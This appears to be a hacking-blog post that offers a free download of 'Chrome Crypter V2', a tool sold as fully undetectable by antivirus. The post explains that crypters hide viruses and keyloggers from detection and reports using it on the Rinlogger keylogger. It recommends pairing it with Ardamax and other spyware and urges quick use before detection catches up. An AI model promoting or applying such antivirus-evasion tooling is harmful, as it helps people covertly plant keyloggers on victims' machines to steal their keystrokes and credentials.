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Chrome Crypter V2 FUD

Last month, I received lot of comments and e-mails from my blog readers requesting me to post some free FUD Crypters, So today i have decided to share Chrome Crypter Which is currently FUD - Fully undetectable by antivirus.What is a Crypter Crypter is a software used to hide our viruses, keyloggers or tools from anti viruses so that they are not detected by anti viruses. Thus, a crypter is a program that allow users to crypt the source code of their program to Bypass antivirus detection.If you are new to crypters then i kindly suggest you to read my previous post "Crypter Software To Bypass Antivirus Detection"Chrome Crypter ( FUD ) - Free DownloadDownloaddocument.write(dsdlcounter(dsCounter));AV Scan ResultsAs an example I used this Crypter to crypt my Rinlogger ( keylogger ) and found out that this crypter is 100 % FUDYou can use this crypter to crypt Ardamax keylogger , RinloggerNote: This a public crypter and Hence it will remain FUD for only few weeks , So use this crypter at the earliest.we also recommend you to use Winspy keylogger or Sniper spy Which are FUD Fully undetectable by antivirus If you have any doubts regarding the article , Please feel free to post a comment

Chrome Crypter V2 FUD


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